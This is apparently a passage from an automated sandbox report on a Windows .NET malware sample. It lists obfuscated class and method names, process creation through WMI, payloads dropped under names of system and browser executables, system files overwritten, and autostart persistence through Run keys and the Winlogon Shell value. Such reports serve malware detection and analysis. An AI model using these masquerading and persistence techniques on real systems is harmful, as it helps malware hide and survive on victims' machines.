                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, X6bYhsiNUbKGRSsiOE1.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'SMTiliTVmgt', 'qxvi2irdvXZ', 'SEHbT5ik23KvW0EQNtnX', 'klMS3XikAbRp1JrZ5T2J', 'd8E3OJikwy41u8YRY9Ev', 'LQUSqwikbAvNLnYemjFl'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, B4JUioVRnk5jIiSObGb.csHigh entropy of concatenated method names: 'hTTWMpiUJoLMPtk7Gicn', 'sLpbBWiUDoWf9lL68K0g', 'MEhYYEiUuN8Zs48DATbF', 'vEFv5niUjnlrsC1UDu2W', 'HKaujCiUmeEpFCnH6gDT', 'method_0', 'method_1', 'ahkV6a2RIU', 'WkeVc83Mav', 'kNnVO8Yv6o'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, QwehKZb8ueLads8sbWA.csHigh entropy of concatenated method names: 'xwFbTQKpRm', 'G2cb30EfdW', 'SYGtewiKOy3M5QHEURwf', 'qHeqMUiK9qVM6S4RJpkv', 'O95Ql2iKVLl9k9rR70hD', 'Py88M4iKjinUH3q1i76A', 'kw9yk0iKmQAFfV6Re2M0', 'YOmDgUiKJB15fpH4hx6C'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, IqxyYrkNGFPD305r3vX.csHigh entropy of concatenated method names: 'wZEZdD0Dqg', 'AcIZio19ZL', 'bsyZtt84Au', 'ULAZW3Li7C', 'uTmZ282oEZ', 'HONZA7oSoQ', 'jNm8ZWiSQDPXVTlS6JJ1', 'EmLWBxiSPpEBxKaE8l7F', 'LlR812iSv0Kg4BxgMBkW', 'GRUT9iiSLwm5LifbqU9D'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, iQR6wuWoOGSvNaXAkSK.csHigh entropy of concatenated method names: 'O6sWUxkrWf', 'jCOWrwiR6A', 'XyUW7e28gt', 'lg01gOiZ0ch7g83bGV09', 'PGA7XuiZpYMcfnuwBrFI', 'Ns6c9ZiZHN3ZjSxmNVmg', 'l9K8VuiZxPLHHA11aB2U', 'typWkwdh0Q', 'D89WZlbnwM', 'lvyWCbVyED'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, gKoUwr9PnGwmCMjXUXu.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'N739QHJq1n', 'YVFilcdu25L', 'VTB0WmiBUSnUqRUiwl2J', 'yuTKwuiBGXI4Hdmk2xwE', 'D7ea6giBB848QpRW0NfX', 'dYiLJFiBrKDWbo2uDc0D', 'LxH3NOiB7ji8ogPeC8Of'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, XH0TRIl5gB0medhCwvu.csHigh entropy of concatenated method names: 'kO3lZPiiLk', 'fUElCZ1JU0', 'TZXlMQMDkM', 'QtAlfsx0f4', 'eYHlKLvvxA', 'RJolELSXoH', 'OrAZECiEx5Y8Zt57L9o8', 'cUU1FKiE0SKsmb2RE5mT', 'aEencGiEpEGXGE1xu5qd', 'vwmvmliEPiK5r8sVrKWO'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, yvr2rsO0cr8tny7vVI8.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'joVilnnoCDX', 'p45i2a19D8x', 'LjMOkhiGZ72oJfi8EyGW', 'EMSmPyiGCltu6sUWvDS7', 'SPG1niiGMcdxnr6bET2q', 's68ggKiGfxx8nDtqy71b', 'LKZwYNiGKZR5Dsrrv9fu'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, cpiPGAsMpiCOT0DXanN.csHigh entropy of concatenated method names: 'S5osKxGapy', 'n2DsEXJ4Cc', 'wM4syja1LY', 'bpBsI81HaM', 'Q4osXqMegt', 'ayDs424Hk8', 'ypUssRkQYK', 'X4bsGZlNow', 'RaHsBmZITC', 'sTusUR2V0N'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, nR43nprA9BCK1fE4ai.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'QorauiQwg'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, DCfLsUjnCnxNCY0F1pw.csHigh entropy of concatenated method names: 'dgTJiUJHHZ', 'HdCqHoirMoIITvWeihU8', 'I579lmirZ8eumERgBEt2', 'OfcSjGirCy2nGcxOEFo4', 'BU4LoUirf4S4KKNIjZwh', 'PkxjgmoKS0', 'ka6jR8utLg', 'StjjY8AKGj', 'TbEj6cIP7K', 'RjHjc8wtkT'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, aLCX6GbOoIJssG89ra0.csHigh entropy of concatenated method names: 'EW9bkoiR2x', 'kMDQlyiKSNXM7V3WQaym', 't50VbBiK7m7jkqJXYI6A', 'XuwKVwiKaT298EDDlR55', 'Wvb50SiK1tVFgbJmMgMA', 'iHP4RHiKhLyNsGbSiiM5', 'SsHbVxGkwp', 'x9Objdj2YV', 'wZsbmfIl8F', 'TcMbJY6OqT'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, QhyS74OkjM3656LNWtP.csHigh entropy of concatenated method names: 'S8UOIGtHp5', 'EhCKYyiGT3HCIGMHHqra', 'G9XVIJiG8InYBuQx2lK8', 'DB6LeViGq2me6RmlemAo', 'h6suVdiG3KnCFy5kO17h', 'aPMOC0ukgo', 'k59OM9trxV', 'idnOfBspMN', 'g0peN8iGb7oRhuomlQSn', 'WyH6qbiGAnK2VogBOc7e'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, aGPL3Et9TXj9nlFfYMR.csHigh entropy of concatenated method names: 'x7vtjOtZGm', 'bPhtm6KVab', 'quPAs9ikKXqGtxicUwu7', 'Mo7bf0ikMa1vWQbgSXU9', 'u37eQ4ikfs5EVWmO43gq', 'fHWy1JikEMJJRMjrODsl', 'FeNSShikyMenuC959vLZ', 'hPO6f4ikI3VxOQMRak1H', 'QU77NkikXH46GxHr1QcN'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, OxQgP8i0rvreOpnqBbY.csHigh entropy of concatenated method names: 'P9X', 'HmViPcvU7P', 'TGvilddEJk9', 'imethod_0', 'WyDiv809VC', 'MTqTuMi5NPnEgCRvN6ty', 'mEgOvci5zVRFNXNcFT1Z', 'cQG13Qi5QCPou5sIJL6p', 'yELOw0i5LrG7HmKHbbYv', 'T7XqneikdfshW1TmJ8Ok'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, nHJmVYDrqlXpPiAxnOt.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'DlODaE9xIk', 'TR3DSxWJGm', 'Dispose', 'D31', 'wNK'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Gxu1DKEXBsm5Q9GVZdD.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'E8YEsjmXV2', 'TSCEGpCUYx', 'JfZEBK1uBw', 'bbUEUyDMxF', 'FG1ErkZBhH', 'a5wE7M1nch', 'QEvRRAiHrRFyoH8uW15K'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, e9NDY147K34r6Knf9s0.csHigh entropy of concatenated method names: 'XRsilDOr7bO', 'LH04SWtuX0', 'J6y41vWEKP', 'hCa4hWy1kO', 'eZTrxyi0mmQKsFhRtxtQ', 'EbXlhsi0JRARHv3sQKp1', 'Chh9WFi0DlL1bJIA28hf', 'GugoMXi0ukCfIkRnEojs', 'pZka5Qi0ouwkLlV8mtjr', 'tt2NUgi05TGOUA24XoDt'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, XmpQBSlagih95BHB7Ji.csHigh entropy of concatenated method names: 'h0NlPUS4WP', 'VCVgKOiyn9LQXQhBF8pM', 'Y8YU91iyTRpOUpNaHOZg', 'qIsVaTiy35WO4XQruDhZ', 'yQP0ikiyFF6Gqd8H9WXe', 'P9X', 'vmethod_0', 'DtFi25dImc3', 'imethod_0', 'PdTaGxiybIUEkVGaqJVq'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PSRmGOJqWuHycAvuAGu.csHigh entropy of concatenated method names: 'yuYJMm1InI', 'Ek9J3fsbIM', 'WOSJnc4QXt', 'JiZJFQB2A7', 'Vl8JgqFf4y', 'LtmJRXD6rg', 'vjYJYSGAeF', 'ocYJ6QVUav', 'x4RJckDZsn', 'y9KJOdq2SG'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, bsc4UPLcO3MfLmXH05e.csHigh entropy of concatenated method names: 'UatLZAOiqw', 'OdOLCHFivA', 'm4HLMvCxIL', 'RRYLfM1gqZ', 'Ax1LK37UHE', 'oX2LErGGgR', 'XOxLyp9Wl3', 'ggWLIMRjOy', 'FTcLXMerHG', 'A0KL4LnKnn'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, esMbHGbI8IGT7emBHil.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'rkui2JdguGm', 'NiiilTdMWVO', 'imethod_0', 'tUrscXiEd7bDqviQKhgf', 'LwVGYtiEieoBjfw1nK4T', 'j6KxK9iKNL6pEBwXH5sW', 'jCA9LniKzmNnb3bquCva', 'mGIIppiEtDeOrHOPS61M'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, qe9qit48gg55wAVWbQ2.csHigh entropy of concatenated method names: 'pRV4DV0kp5', 'KnCoCpi03k1uFbg26i4F', 'g1g1cni0n8a1I8yvMlkr', 'Fmx7Cqi0q8MEcqeEvNsQ', 'AAjpB7i0TPW9gdAo5okU', 'gcfreOi0FvktbHRBjAPR', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csHigh entropy of concatenated method names: 'Fk5YM2iLts2R7yuvyddk', 'Xwrxl8iLWwhWW7HS4Uip', 'gOMQ0yQk3L', 'BU6QwfiLbRjmIYVGwFfF', 'cNfa6uiLliLQb8C0cago', 'x1Are0iL8vgufsCfkhON', 'T6fkhSiLqEK1s2a2epVi', 'G2Dc5OiLTAk5yek5CuDc', 'TOh338iL374AvL5XH8ll', 'zXyFSxiLn1P1VyyqIUYx'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, uICuu7tM7KB0Bi03Ehy.csHigh entropy of concatenated method names: 'dHEtBGkois', 'EUhtUZHfAE', 'alwl83ik7pR756dabeLh', 'wNRJ34ikU24qBMB4mFG3', 'BxjDlOikrWUO97n6sCYh', 'yDW9gSikasbx9BltOVfc', 'O3MtSD0s8y', 'OBOT81ikeD7wVso2E08B', 'mX9UlwikH6aH8TLn4BdZ', 'B1l8yRik1R8X4ZmkGF7B'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, TBtDe62uh6WG10oGWYM.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'h2cilWZj0Zs', 'qxvi2irdvXZ', 'Y0AcVKiCE8hRqgXqJYXH', 'zZ0x4BiCyGUCQ8Ksb3iD', 'WaoZV4iCItgTwlQpvYu6'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, EmgHwe5B24IhueYAWef.csHigh entropy of concatenated method names: 'RUS5LaVDYk', 'YpW5zryHel', 'u3K5rm6JB2', 'Bq557v9rZu', 'o6U5aa00Al', 'Vs35SGENHq', 'g4A51QRHqU', 'kpn5hkFuIO', 'O0R5eBNELr', 'R0a5Hl30H2'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, P3etnk8JoJxwsnpKCOn.csHigh entropy of concatenated method names: 'NWvAfliXsdGMeG9BT6cE', 'ddgWbeiXXxUcr1MJM9SV', 'fco6NmiX4y7yxVMMidjT', 'VVBEPDiXG7KZhSbQxej9', 'XPAFNeErTP', 'RChxSoiX7B1oaZG3OlC4', 'hyT1siiXUJueFkpKNv8f', 'jfMaTuiXrS7BYsg22Zn5', 'GJ8G6QiXalCJkdBUuIan', 'mR2pyaiXSm1QIm6XNcaO'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, iI3u62LsqMDk2SGSu1o.csHigh entropy of concatenated method names: 'tOqiwfHXMBh', 'JrKiwKhuKhK', 'QDFiwE0OnrF', 'CeEiwyQGE0T', 'Dy3iwIdHs1m', 'UTXiwXDSrEd', 'cOSiw4ayvjb', 'q85NAodIeU', 'ReUiwsmb9j2', 'SxbiwG8peYL'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, DlAROugTGCE0CeLZYSN.csHigh entropy of concatenated method names: 'Dispose', 'ItFgnF9Agi', 'DgbgFdNXWl', 'C1DggJmuRR', 'J8Cl7Li4tN2F8RoPp9Hf', 'IsOvnyi4W0u2AAdbrkY4', 'FTsITRi42rdJRlysdOFZ', 'ahf1LHi4AGrI0dVmarXO', 'UYybC1i4w6uLp3Gheupj', 'zK8jRqi4b9425oVr27DD'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, oAnW94IyAqoSMguHNCg.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'R3Q2eaixZP0Imxd6m2JH', 'qwaGPVix5cEVimFXG2wf', 'sPlpHTixksj6ruouSQOO'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, YjmA5AoMZbDZP9HJoJf.csHigh entropy of concatenated method names: 'method_0', 'rpmoKmLNlk', 'G0hoEPwUCJ', 'lNSoybn0MX', 'SCsoIDymyd', 'EE5oXXxo12', 'H83o45YaoE', 'CW4GKBia5C5j0qboAMkH', 'xpdyX1iauusupdWIPedf', 'NblQhFiaoGBMa4kUy4Mi'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, EFjEUUwBjTx6h9LWUEb.csHigh entropy of concatenated method names: 'WrZwPHhcn7', 'kbJwvP93S5', 'cArwQsTr9C', 'rYA5j3iKqU1kUCcBs1yD', 'Arm6rGiKldPraRPkJoOQ', 'usfLfXiK8m7TaTa3ncSD', 'Rl1wriIwAK', 'PBZw76iomc', 'J0swak5GcC', 'nGuwSvTVSU'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, CSZFHZtA32hGyGtnBbK.csHigh entropy of concatenated method names: 'cQitbLK5f9', 'yhvtlgsJcZ', 'GQYt8xZ0cA', 'uXPtqBCfE0', 'E1WwxpikOXUyC3b6vYxX', 'YcZYvEik6NlrV5PxjlNW', 'DRtcPnikckmHtKMpMxNB', 'K0rbJrik9DlhNH90NAId', 'YrhajXikVQDFJs3r5BRl', 'FBcqEOikjeQDj31GwhnH'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, i5YPtFWeJXqoTOQ8dVR.csHigh entropy of concatenated method names: 'PjL2Ws470b', 'Ct522qM7tO', 'xA82A3XmfU', 'Pt679EiCT7W7YjewQaHb', 'CmEKtkiC3h48nP6GDwxa', 'BmsXQ5iC8au1cqYQnUv1', 'DyycN9iCqO6WM0eeCAu5', 'SaJ2T46Ft7', 'b2m3UPiCRkM1oYg0ION9', 'Ty1DPOiCFSaFMbSom75j'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, zLYkeDGygZGcsJeH99P.csHigh entropy of concatenated method names: 'jXxPcgipSZJ1Frtpx66X', 'lBp8ioip7hA49nE0YBQl', 'xQG2iMipa7eLVdtJo4Ve', 'gQLQGdipGGRXASpZdtH7', 'syQ99oipB0bWEiouVNSK', 'rvGoJtipUT7k8fvpuaRc', 'qk2O6yip4It78BySCCSE', 'jVI5feipsXWT3EgBgS5G'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, MfsJNnCNPE1SJyYFFJ8.csHigh entropy of concatenated method names: 'yYuMdMRC1m', 'fleMiTiPk0', 'Yd7', 'zeSMtEIiSO', 'bAgMW9cx7p', 'BmdM2oQTT0', 'iYDMAharP3', 'r85TvWihv6IRGHjkWI0T', 'iE2gwFihpJZAN0WQuZny', 'Mxqb9iihP8kh1PTsfgw2'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, K2EcfJMl2hIMTaie8fg.csHigh entropy of concatenated method names: 'sCoMqVdaWb', 'VHFMTUk4e0', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'aoYM31tToQ', 'method_2', 'uc7'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, f4pLEm8FWgPFpXYZfRa.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'st7FFTiyXyMFlvenOCnT', 'Ydlipkiy4oZOpKeSBlWr', 'cCa1NviyswOyZhxDTkNi', 'GEXEPMiyGr4DEj0qJJuk'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, kcc1yHkaBgPOiETSJMB.csHigh entropy of concatenated method names: 'xtAk1dPNn1', 'yJ9khxNVLO', 'CgJkeGF6dD', 'ELeXfwiSsqo9gaXgMxM8', 'vr5Dt5iSGOpUnofNmrxZ', 'NJJcODiSBBLk3vEiRZZg', 'Y5gRaBiSUDSJLvVHR0jg', 'oYjFl3iSr1hJweLQvQJ9', 'oo3SrUiS7xJbTvh3bRdM', 'rFkywpiSaVJYEG0PsguG'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, XSIucO9hTsDHKBoXwSD.csHigh entropy of concatenated method names: 'u0FilY1VZKt', 'RQd9HmgFQ8', 'kG0il6nGbc1', 'I15jiDiBKx2c7rtZTLAj', 'vLpaPgiBEGqswbUmIrm8', 'vIXBbGiBMtIEOiZLohif', 'MFjJEEiBfRjX9O5nPCD1', 'SwYj04iBy2CsVXhJegZE', 'W7Kc7DiBIwingh7J9JwR', 'wAJfiViBXIcm2pTZTLcf'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: unknownExecutable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeRenamed to system file: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Program Files\7-Zip\Lang\upfc.exeJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\AHphtSeX.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\jjSkKJFG.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\PDlWdMMS.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\wlyrJHCD.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\rUKsZmvt.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\YPnuykix.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\upfc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\FUSHtkHk.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\CUcqaUVf.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Recovery\llflCdrMcgGB.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\YPnuykix.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\PDlWdMMS.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\FUSHtkHk.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\wlyrJHCD.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\CUcqaUVf.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\rUKsZmvt.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\jjSkKJFG.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile created: C:\Users\user\Desktop\AHphtSeX.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates autostart registry keys with suspicious names
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
